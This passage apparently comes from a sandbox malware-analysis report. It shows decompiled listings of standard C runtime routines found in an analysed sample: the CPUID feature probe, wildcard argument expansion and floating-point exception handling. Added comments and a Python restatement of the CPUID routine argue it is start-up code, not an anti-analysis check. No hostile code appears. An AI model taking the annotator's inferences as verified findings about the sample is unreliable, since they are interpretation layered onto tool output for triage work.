        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: Process$CurrentExitTerminate
        • String ID:
        • API String ID: 1703294689-0
        • Opcode ID: f31c5546d564875db0e06bc5d16c02ed325e5de928041f1356f9c4b768c38380
        • Instruction ID: 2bec2746d834b899b9febcd200ac4aa292d98cfc0f35a1979e40f3d1872b236c
        • Opcode Fuzzy Hash: f31c5546d564875db0e06bc5d16c02ed325e5de928041f1356f9c4b768c38380
        • Instruction Fuzzy Hash: 70E0B631924148AFCF11AF69ED0DA593B69EF51741F148414F8058A122DBBADEA3CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E0026280B(intOrPtr __edx) {
        			// Consistent with the MSVC CRT's __isa_available_init: the CPUID probe every MSVC-built binary runs at start-up.
        			// Globals: *0x2737d4 = __isa_available (0 x86, 1 SSE2, 2 SSE4.2, 3 AVX, 5 AVX2), *0x273010 = __isa_enabled bit mask,
        			// *0x2737d8 = __favor (bit 0 Atom, bit 1 ERMS). The "query CPU information (cpuid)" signature is satisfied by this
        			// CRT code; it is not a VM or sandbox check.
        				signed int _v8;
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				signed char _v24;
        				signed int _v28;
        				signed int _v32;
        				signed int _v36;
        				signed int _v40;
        				signed int _v44;
        				signed int _v48;
        				signed int _t59;
        				signed int _t62;
        				signed int _t63;
        				intOrPtr _t65;
        				signed int _t66;
        				signed int _t68;
        				intOrPtr _t73;
        				intOrPtr* _t75;
        				intOrPtr* _t77;
        				intOrPtr _t84;
        				intOrPtr* _t86;
        				signed int _t91;
        				signed int _t94;
        
        				_t84 = __edx;                                                                       // 0x0026280b
        				 *0x2737d4 =  *0x2737d4 & 0x00000000;                                               // 0x0026280e  __isa_available = 0
        				 *0x273010 =  *0x273010 | 1;                                                        // 0x0026281c  __isa_enabled |= X86
        				if(IsProcessorFeaturePresent(0xa) == 0) {                                           // 0x0026282b  PF_XMMI64_INSTRUCTIONS_AVAILABLE (SSE2)
        					L20:                                                                            // 0x002629a8
        					return 0;                                                                       // 0x002629ae
        				}                                                                                   // 0x002629ae
        				_v24 = _v24 & 0x00000000;                                                           // 0x00262831  leaf-7 EBX, defaults to 0
        				 *0x273010 =  *0x273010 | 0x00000002;                                               // 0x00262837  SSE2
        				 *0x2737d4 = 1;                                                                     // 0x00262842
        				_t86 =  &_v48;                                                                      // 0x00262848
        				_push(1);                                                                           // 0x0026284b
        				asm("cpuid");                                                                       // 0x0026284c  leaf 0: max basic leaf in EAX, vendor string in EBX:EDX:ECX
        				_pop(_t73);                                                                         // 0x00262850
        				 *_t86 = 0;                                                                         // 0x00262851
        				 *((intOrPtr*)(_t86 + 4)) = 1;                                                      // 0x00262853
        				 *((intOrPtr*)(_t86 + 8)) = 0;                                                      // 0x00262856
        				 *((intOrPtr*)(_t86 + 0xc)) = _t84;                                                 // 0x0026285b
        				_v16 = _v48;                                                                        // 0x00262864  max basic leaf
        				_v8 = _v36 ^ 0x49656e69;                                                            // 0x00262875  EDX ^ "ineI"
        				_v12 = _v40 ^ 0x6c65746e;                                                           // 0x00262880  ECX ^ "ntel"
        				_push(1);                                                                           // 0x00262886
        				asm("cpuid");                                                                       // 0x00262887  leaf 1: family/model in EAX, feature bits in ECX/EDX
        				_t75 =  &_v48;                                                                      // 0x0026288f
        				 *_t75 = 1;                                                                         // 0x00262895
        				 *((intOrPtr*)(_t75 + 4)) = _t73;                                                   // 0x00262897
        				 *((intOrPtr*)(_t75 + 8)) = 0;                                                      // 0x0026289a
        				 *((intOrPtr*)(_t75 + 0xc)) = _t84;                                                 // 0x0026289d
        				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {                                         // 0x002628a0  EBX ^ "Genu": non-zero unless the vendor is "GenuineIntel"
        					L9:                                                                             // 0x002628e5
        					_t91 =  *0x2737d8; // 0x2                                                       // 0x002628e5  __favor (dump value 2: ERMS set, Atom clear)
        					L10:                                                                            // 0x002628eb
        					_v32 = _v36;                                                                    // 0x002628f2  leaf-1 EDX
        					_t59 = _v40;                                                                    // 0x002628f5  leaf-1 ECX
        					_v8 = _t59;                                                                     // 0x002628f8
        					_v28 = _t59;                                                                    // 0x002628fb
        					if(_v16 >= 7) {                                                                 // 0x002628fe
        						_t65 = 7;                                                                   // 0x00262902
        						_push(_t75);                                                                // 0x00262905
        						asm("cpuid");                                                               // 0x00262906  leaf 7, sub-leaf 0: structured extended features
        						_t77 =  &_v48;                                                              // 0x0026290b
        						 *_t77 = _t65;                                                              // 0x0026290e
        						 *((intOrPtr*)(_t77 + 4)) = _t75;                                           // 0x00262910
        						 *((intOrPtr*)(_t77 + 8)) = 0;                                              // 0x00262913
        						 *((intOrPtr*)(_t77 + 0xc)) = _t84;                                         // 0x00262916
        						_t66 = _v44;                                                                // 0x00262919  leaf-7 EBX
        						_v24 = _t66;                                                                // 0x00262921
        						_t59 = _v8;                                                                 // 0x00262924
        						if((_t66 & 0x00000200) != 0) {                                              // 0x00262927  bit 9: ERMS (enhanced REP MOVSB/STOSB)
        							 *0x2737d8 = _t91 | 0x00000002;                                         // 0x0026292c  __favor |= ENFSTRG
        						}                                                                           // 0x0026292c
        					}                                                                               // 0x00262927
        					if((_t59 & 0x00100000) != 0) {                                                  // 0x00262939  leaf-1 ECX bit 20: SSE4.2
        						 *0x273010 =  *0x273010 | 0x00000004;                                       // 0x0026293b
        						 *0x2737d4 = 2;                                                             // 0x00262942
        						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {                 // 0x00262951  bit 27 OSXSAVE and bit 28 AVX
        							asm("xgetbv");                                                          // 0x0026295c  XCR0
        							_v20 = _t59;                                                            // 0x0026295f
        							_v16 = _t84;                                                            // 0x00262962
        							if((_v20 & 0x00000006) == 6 && 0 == 0) {                                // 0x00262973  OS saves XMM and YMM state (the high-dword test was folded by the decompiler)
        								_t62 =  *0x273010; // 0x2f                                          // 0x00262979  dump value 0x2f = X86|SSE2|SSE4.2|AVX|AVX2: the analysis host exposed AVX2
        								_t63 = _t62 | 0x00000008;                                           // 0x0026297e  AVX
        								 *0x2737d4 = 3;                                                     // 0x00262981
        								 *0x273010 = _t63;                                                  // 0x0026298f
        								if((_v24 & 0x00000020) != 0) {                                      // 0x00262994  leaf-7 EBX bit 5: AVX2
        									 *0x2737d4 = 5;                                                 // 0x00262999
        									 *0x273010 = _t63 | 0x00000020;                                 // 0x002629a3
        								}                                                                   // 0x002629a3
        							}                                                                       // 0x00262994
        						}                                                                           // 0x00262973
        					}                                                                               // 0x00262951
        					goto L20;
        				}                                                                                   // 0x00262939
        				_t68 = _v48 & 0x0fff3ff0;                                                           // 0x002628a5  family/model signature from leaf-1 EAX, stepping masked
        				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {  // 0x002628af  Intel Atom models
        					_t94 =  *0x2737d8; // 0x2                                                       // 0x002628d4
        					_t91 = _t94 | 0x00000001;                                                       // 0x002628da  __favor |= ATOM
        					 *0x2737d8 = _t91;                                                              // 0x002628dd
        					goto L10;
        				} else {
        					goto L9;
        				}
        			}

        APIs
        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00262824
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: FeaturePresentProcessor
        • String ID:
        • API String ID: 2325560087-3916222277
        • Opcode ID: 90e8a02e6d7f70ec969d27dfe0e090fd3ab49bb4fab0af06b4d8e63d2b3c8b5c
        • Instruction ID: 26dfdf7fb9347cbefc58f9ab96201d2552d7c7ef49ae76d6e73846e41c91d965
        • Opcode Fuzzy Hash: 90e8a02e6d7f70ec969d27dfe0e090fd3ab49bb4fab0af06b4d8e63d2b3c8b5c
        • Instruction Fuzzy Hash: BE518FB1E21605DFDB18CF69E98579EBBF4FB48310F24846AD408E7290D3749A94DFA0
        Uniqueness

        Uniqueness Score: -1.00%
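
For a triager who wants to confirm that a sample's cpuid routine is this start-up probe rather than something of the sample's own, the following Python is an added example, not code from the report, the sample or the CRT. It restates the decompiled branching of E0026280B as a pure function of the CPUID register values, so it runs anywhere and can be compared against a listing step by step. The names isa_available, isa_enabled and favor are the CRT globals that the stores to 0x2737d4, 0x273010 and 0x2737d8 appear to correspond to; that identification is an inference from the code, not something the report states. The register sets at the bottom are constructed inputs, not measurements; the first of them reproduces the __isa_enabled value 0x2f that the decompiler annotated from the analysis host's memory (`*0x273010; // 0x2f`).

```python
"""Added example (not the report's, the sample's or the CRT's code): the CPUID probe
decompiled as E0026280B, restated as a pure function of the CPUID register values."""

# cpuid(0) returns the vendor string in EBX, EDX, ECX; the decompiled code xors those
# registers with 0x756e6547 "Genu", 0x49656e69 "ineI", 0x6c65746e "ntel".
GENUINE_INTEL = (0x756E6547, 0x49656E69, 0x6C65746E)
# cpuid(1) EAX with stepping and reserved bits masked (& 0x0FFF3FF0): the Intel Atom
# family/model signatures the routine special-cases.
ATOM_SIGNATURES = {0x106C0, 0x20660, 0x20670, 0x30650, 0x30660, 0x30670}

# Levels and masks as stored by the listing above (names are an inference, see lead-in).
ISA_X86, ISA_SSE2, ISA_SSE42, ISA_AVX, ISA_AVX2 = 0, 1, 2, 3, 5
ENABLED_X86, ENABLED_SSE2, ENABLED_SSE42, ENABLED_AVX, ENABLED_AVX2 = 0x1, 0x2, 0x4, 0x8, 0x20
FAVOR_ATOM, FAVOR_ENFSTRG = 0x1, 0x2


def isa_probe(sse2_present, leaf0, leaf1, leaf7=(0, 0, 0, 0), xcr0=0):
    """leaf0/leaf1/leaf7 are (eax, ebx, ecx, edx) as returned by cpuid(0), cpuid(1) and
    cpuid(7, 0); sse2_present stands for IsProcessorFeaturePresent(PF_XMMI64_INSTRUCTIONS_AVAILABLE);
    xcr0 is the low dword of XGETBV(0). Returns (isa_available, isa_enabled, favor)."""
    available, enabled, favor = ISA_X86, ENABLED_X86, 0
    if not sse2_present:
        return available, enabled, favor
    available, enabled = ISA_SSE2, enabled | ENABLED_SSE2

    max_leaf, ebx0, ecx0, edx0 = leaf0
    eax1, _, ecx1, _ = leaf1
    if (ebx0, edx0, ecx0) == GENUINE_INTEL and (eax1 & 0x0FFF3FF0) in ATOM_SIGNATURES:
        favor |= FAVOR_ATOM                 # Atom: prefer the non-SSE4.2 memcpy/memset paths

    leaf7_ebx = 0
    if max_leaf >= 7:                       # leaf 7 is only queried when the CPU reports it
        leaf7_ebx = leaf7[1]
        if leaf7_ebx & 0x200:               # bit 9: ERMS, enhanced REP MOVSB/STOSB
            favor |= FAVOR_ENFSTRG

    if ecx1 & 0x00100000:                   # leaf-1 ECX bit 20: SSE4.2
        available, enabled = ISA_SSE42, enabled | ENABLED_SSE42
        if ecx1 & 0x08000000 and ecx1 & 0x10000000:   # bit 27 OSXSAVE and bit 28 AVX
            if (xcr0 & 0x6) == 0x6:         # OS saves both XMM and YMM state
                available, enabled = ISA_AVX, enabled | ENABLED_AVX
                if leaf7_ebx & 0x20:        # leaf-7 EBX bit 5: AVX2
                    available, enabled = ISA_AVX2, enabled | ENABLED_AVX2
    return available, enabled, favor


# Constructed register sets (not measurements): an AVX2 Intel desktop part, a Bonnell
# Atom without SSE4.2, and a non-Intel CPU whose OS has not enabled YMM state in XCR0.
AVX2_INTEL = dict(sse2_present=True,
                  leaf0=(0xD, 0x756E6547, 0x6C65746E, 0x49656E69),
                  leaf1=(0x000906EA, 0, 0x18100000, 0),
                  leaf7=(0, 0x220, 0, 0), xcr0=0x7)
ATOM_INTEL = dict(sse2_present=True,
                  leaf0=(0xA, 0x756E6547, 0x6C65746E, 0x49656E69),
                  leaf1=(0x000106C2, 0, 0, 0))
AVX_NO_YMM = dict(sse2_present=True,
                  leaf0=(0xD, 0x68747541, 0x444D4163, 0x69746E65),
                  leaf1=(0x00800F82, 0, 0x18100000, 0), xcr0=0x1)
```

isa_probe(**AVX2_INTEL) returns (5, 0x2f, 2): level AVX2, all five enabled bits, ERMS favoured; the Atom set stops at SSE2 with the Atom bit set, and the non-Intel set stops at SSE4.2 because XCR0 does not have YMM state enabled even though leaf 1 advertises AVX.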

        C-Code - Quality: 72%
        			E002651DA(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
        			// CRT argv wildcard expansion: copies the directory prefix (_a8, _a12 bytes) and the file name (_a4) into a fresh buffer and
        			// appends it to the argument vector (_a16). The decompiler has fused two routines into this listing: the five-argument call
        			// to E00264F73 followed by asm("int3") is the shape of the CRT's non-returning _invalid_parameter(0, 0, 0, 0, 0), and
        			// everything from "_t118 = _t120;" onward (FindFirstFileExA / FindNextFileA over the pattern, recursing into E002651DA
        			// for every match other than "." and "..") is the next function's body.
        				intOrPtr _v8;
        				signed int _v12;
        				intOrPtr* _v32;
        				CHAR* _v36;
        				signed int _v48;
        				char _v286;
        				signed int _v287;
        				struct _WIN32_FIND_DATAA _v332;
        				intOrPtr* _v336;
        				signed int _v340;
        				signed int _v344;
        				intOrPtr _v372;
        				signed int _t35;
        				signed int _t40;
        				signed int _t43;
        				intOrPtr _t45;
        				signed char _t47;
        				intOrPtr* _t55;
        				union _FINDEX_INFO_LEVELS _t57;
        				signed int _t62;
        				signed int _t65;
        				void* _t72;
        				void* _t74;
        				signed int _t75;
        				void* _t78;
        				CHAR* _t79;
        				intOrPtr* _t83;
        				intOrPtr _t85;
        				void* _t87;
        				intOrPtr* _t88;
        				signed int _t92;
        				signed int _t96;
        				void* _t101;
        				intOrPtr _t102;
        				signed int _t105;
        				union _FINDEX_INFO_LEVELS _t106;
        				void* _t111;
        				intOrPtr _t112;
        				void* _t113;
        				signed int _t118;
        				void* _t119;
        				signed int _t120;
        				void* _t121;
        				void* _t122;
        
        				_push(__ecx);
        				_t83 = _a4;
        				_t2 = _t83 + 1; // 0x1
        				_t101 = _t2;
        				do {
        					_t35 =  *_t83;
        					_t83 = _t83 + 1;
        				} while (_t35 != 0);
        				_push(__edi);
        				_t105 = _a12;
        				_t85 = _t83 - _t101 + 1;
        				_v8 = _t85;
        				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
        					_push(__ebx);
        					_push(__esi);
        					_t5 = _t105 + 1; // 0x1
        					_t78 = _t5 + _t85;
        					_t111 = E0026479B(_t85, _t78, 1);
        					_pop(_t87);
        					__eflags = _t105;
        					if(_t105 == 0) {
        						L6:
        						_push(_v8);
        						_t78 = _t78 - _t105;
        						_t40 = E0026874B(_t87, _t111 + _t105, _t78, _a4);
        						_t120 = _t119 + 0x10;
        						__eflags = _t40;
        						if(__eflags != 0) {
        							goto L9;
        						} else {
        							_t72 = E00265419(_a16, _t101, __eflags, _t111);
        							E00264676(0);
        							_t74 = _t72;
        							goto L8;
        						}
        					} else {
        						_push(_t105);
        						_t75 = E0026874B(_t87, _t111, _t78, _a8);
        						_t120 = _t119 + 0x10;
        						__eflags = _t75;
        						if(_t75 != 0) {
        							L9:
        							_push(0);
        							_push(0);
        							_push(0);
        							_push(0);
        							_push(0);
        							E00264F73();              // non-returning invalid-parameter call (five zero arguments)
        							asm("int3");              // padding after the no-return call; the next function starts here
        							_t118 = _t120;            // prologue of the following routine, fused into this listing by the decompiler
        							_t121 = _t120 - 0x150;
        							_t43 =  *0x273018; // 0x16a19189
        							_v48 = _t43 ^ _t118;
        							_t88 = _v32;
        							_push(_t78);
        							_t79 = _v36;
        							_push(_t111);
        							_t112 = _v332.cAlternateFileName;
        							_push(_t105);
        							_v372 = _t112;
        							while(1) {
        								__eflags = _t88 - _t79;
        								if(_t88 == _t79) {
        									break;
        								}
        								_t45 =  *_t88;
        								__eflags = _t45 - 0x2f;
        								if(_t45 != 0x2f) {
        									__eflags = _t45 - 0x5c;
        									if(_t45 != 0x5c) {
        										__eflags = _t45 - 0x3a;
        										if(_t45 != 0x3a) {
        											_t88 = E002687A0(_t79, _t88);
        											continue;
        										}
        									}
        								}
        								break;
        							}
        							_t102 =  *_t88;
        							__eflags = _t102 - 0x3a;
        							if(_t102 != 0x3a) {
        								L19:
        								_t106 = 0;
        								__eflags = _t102 - 0x2f;
        								if(_t102 == 0x2f) {
        									L23:
        									_t47 = 1;
        									__eflags = 1;
        								} else {
        									__eflags = _t102 - 0x5c;
        									if(_t102 == 0x5c) {
        										goto L23;
        									} else {
        										__eflags = _t102 - 0x3a;
        										if(_t102 == 0x3a) {
        											goto L23;
        										} else {
        											_t47 = 0;
        										}
        									}
        								}
        								_t90 = _t88 - _t79 + 1;
        								asm("sbb eax, eax");
        								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
        								E00262CE0(_t106,  &_v332, _t106, 0x140);
        								_t122 = _t121 + 0xc;
        								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
        								_t55 = _v336;
        								__eflags = _t113 - 0xffffffff;
        								if(_t113 != 0xffffffff) {
        									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
        									__eflags = _t92;
        									_t93 = _t92 >> 2;
        									_v344 = _t92 >> 2;
        									do {
        										__eflags = _v332.cFileName - 0x2e;
        										if(_v332.cFileName != 0x2e) {
        											L36:
        											_push(_t55);
        											_t57 = E002651DA(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
        											_t122 = _t122 + 0x10;
        											__eflags = _t57;
        											if(_t57 != 0) {
        												goto L26;
        											} else {
        												goto L37;
        											}
        										} else {
        											_t93 = _v287;
        											__eflags = _t93;
        											if(_t93 == 0) {
        												goto L37;
        											} else {
        												__eflags = _t93 - 0x2e;
        												if(_t93 != 0x2e) {
        													goto L36;
        												} else {
        													__eflags = _v286;
        													if(_v286 == 0) {
        														goto L37;
        													} else {
        														goto L36;
        													}
        												}
        											}
        										}
        										goto L40;
        										L37:
        										_t62 = FindNextFileA(_t113,  &_v332);
        										__eflags = _t62;
        										_t55 = _v336;
        									} while (_t62 != 0);
        									_t103 =  *_t55;
        									_t96 = _v344;
        									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
        									__eflags = _t96 - _t65;
        									if(_t96 != _t65) {
        										E00268300(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00265032);
        									}
        								} else {
        									_push(_t55);
        									_t57 = E002651DA(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
        									L26:
        									_t106 = _t57;
        								}
        								__eflags = _t113 - 0xffffffff;
        								if(_t113 != 0xffffffff) {
        									FindClose(_t113);
        								}
        							} else {
        								__eflags = _t88 -  &(_t79[1]);
        								if(_t88 ==  &(_t79[1])) {
        									goto L19;
        								} else {
        									_push(_t112);
        									E002651DA(_t79, _t88, 0, _t112, _t79, 0, 0);
        								}
        							}
        							__eflags = _v12 ^ _t118;
        							return E002629BB(_v12 ^ _t118);
        						} else {
        							goto L6;
        						}
        					}
        				} else {
        					_t74 = 0xc;
        					L8:
        					return _t74;
        				}
        				L40:
        			}

        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID:
        • String ID: .
        • API String ID: 0-248832578
        • Opcode ID: 550bafeb7440cff57771b5d706f9a765665c92614d2adfba0dbba864e1a56aa0
        • Instruction ID: c4935911f62bdb3441139061be7f85624e7e0422526978d444e1dcc2527d4dd9
        • Opcode Fuzzy Hash: 550bafeb7440cff57771b5d706f9a765665c92614d2adfba0dbba864e1a56aa0
        • Instruction Fuzzy Hash: 0A313A7191061AAFCB24DE78CC88EFA7BBDEF45314F140198F859D7251E6709D948B90
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0026B735(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
        				signed int _t172;
        				signed int _t175;
        				signed int _t178;
        				signed int* _t179;
        				signed int _t195;
        				signed int _t199;
        				signed int _t202;
        				void* _t203;
        				void* _t206;
        				signed int _t209;
        				void* _t210;
        				signed int _t225;
        				unsigned int* _t240;
        				signed char _t242;
        				signed int* _t250;
        				unsigned int* _t256;
        				signed int* _t257;
        				signed char _t259;
        				long _t262;
        				signed int* _t265;
        
        				 *(_a4 + 4) = 0;
        				_t262 = 0xc000000d;
        				 *(_a4 + 8) = 0;
        				 *(_a4 + 0xc) = 0;
        				_t242 = _a12;
        				if((_t242 & 0x00000010) != 0) {
        					_t262 = 0xc000008f;
        					 *(_a4 + 4) =  *(_a4 + 4) | 1;
        				}
        				if((_t242 & 0x00000002) != 0) {
        					_t262 = 0xc0000093;
        					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
        				}
        				if((_t242 & 0x00000001) != 0) {
        					_t262 = 0xc0000091;
        					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
        				}
        				if((_t242 & 0x00000004) != 0) {
        					_t262 = 0xc000008e;
        					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
        				}
        				if((_t242 & 0x00000008) != 0) {
        					_t262 = 0xc0000090;
        					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
        				}
        				_t265 = _a8;
        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
        				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
        				_t259 = E00269026(_a4);
        				if((_t259 & 0x00000001) != 0) {
        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
        				}
        				if((_t259 & 0x00000004) != 0) {
        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
        				}
        				if((_t259 & 0x00000008) != 0) {
        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
        				}
        				if((_t259 & 0x00000010) != 0) {
        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
        				}
        				if((_t259 & 0x00000020) != 0) {
        					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
        				}
        				_t172 =  *_t265 & 0x00000c00;
        				if(_t172 == 0) {
        					 *_a4 =  *_a4 & 0xfffffffc;
        				} else {
        					if(_t172 == 0x400) {
        						_t257 = _a4;
        						_t225 =  *_t257 & 0xfffffffd | 1;
        						L26:
        						 *_t257 = _t225;
        						L29:
        						_t175 =  *_t265 & 0x00000300;
        						if(_t175 == 0) {
        							_t250 = _a4;
        							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
        							L35:
        							 *_t250 = _t178;
        							L36:
        							_t179 = _a4;
        							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
        							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
        							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
        							if(_a28 == 0) {
        								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
        								 *((long long*)(_a4 + 0x10)) =  *_a20;
        								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
        								_t254 = _a4;
        								_t240 = _a24;
        								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
        								 *(_a4 + 0x50) =  *_t240;
        							} else {
        								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
        								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
        								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
        								_t240 = _a24;
        								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
        								 *(_a4 + 0x50) =  *_t240;
        							}
        							E00268F8C(_t254);
        							RaiseException(_t262, 0, 1,  &_a4);
        							_t256 = _a4;
        							if((_t256[2] & 0x00000010) != 0) {
        								 *_t265 =  *_t265 & 0xfffffffe;
        							}
        							if((_t256[2] & 0x00000008) != 0) {
        								 *_t265 =  *_t265 & 0xfffffffb;
        							}
        							if((_t256[2] & 0x00000004) != 0) {
        								 *_t265 =  *_t265 & 0xfffffff7;
        							}
        							if((_t256[2] & 0x00000002) != 0) {
        								 *_t265 =  *_t265 & 0xffffffef;
        							}
        							if((_t256[2] & 0x00000001) != 0) {
        								 *_t265 =  *_t265 & 0xffffffdf;
        							}
        							_t195 =  *_t256 & 0x00000003;
        							if(_t195 == 0) {
        								 *_t265 =  *_t265 & 0xfffff3ff;
        							} else {
        								_t206 = _t195 - 1;
        								if(_t206 == 0) {
        									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
        									L55:
        									 *_t265 = _t209;
        									L58:
        									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
        									if(_t199 == 0) {
        										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
        										L64:
        										 *_t265 = _t202;
        										L65:
        										if(_a28 == 0) {
        											 *_t240 = _t256[0x14];
        										} else {
        											 *_t240 = _t256[0x14];
        										}
        										return _t202;
        									}
        									_t203 = _t199 - 1;
        									if(_t203 == 0) {
        										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
        										goto L64;
        									}
        									_t202 = _t203 - 1;
        									if(_t202 == 0) {
        										 *_t265 =  *_t265 & 0xfffff3ff;
        									}
        									goto L65;
        								}
        								_t210 = _t206 - 1;
        								if(_t210 == 0) {
        									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
        									goto L55;
        								}
        								if(_t210 == 1) {
        									 *_t265 =  *_t265 | 0x00000c00;
        								}
        							}
        							goto L58;
        						}
        						if(_t175 == 0x200) {
        							_t250 = _a4;
        							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
        							goto L35;
        						}
        						if(_t175 == 0x300) {
        							 *_a4 =  *_a4 & 0xffffffe3;
        						}
        						goto L36;
        					}
        					if(_t172 == 0x800) {
        						_t257 = _a4;
        						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
        						goto L26;
        					}
        					if(_t172 == 0xc00) {
        						 *_a4 =  *_a4 | 0x00000003;
        					}
        				}
        			}

        APIs
        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0026B730,?,?,00000008,?,?,0026B3D0,00000000), ref: 0026B962
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ExceptionRaise
        • String ID:
        • API String ID: 3997070919-0
        • Opcode ID: 00a5052d3ccc7e1a3f276b5cc73a54603234640315d3b503fff9fb7d8ee9ed12
        • Instruction ID: dd371f74595c6280f4fd8e19717cb49b7e2738abf764d04a4ac2c5f5eaa72a6a
        • Opcode Fuzzy Hash: 00a5052d3ccc7e1a3f276b5cc73a54603234640315d3b503fff9fb7d8ee9ed12
        • Instruction Fuzzy Hash: 9BB13C31620609DFDB16CF28C48AB657BE0FF45365F298658E999CF2A1C335E9E1CB40
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00267394() {
        				signed int _t3;
        
        				_t3 = GetProcessHeap();
        				 *0x274170 = _t3;
        				return _t3 & 0xffffff00 | _t3 != 0x00000000;
        			}
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
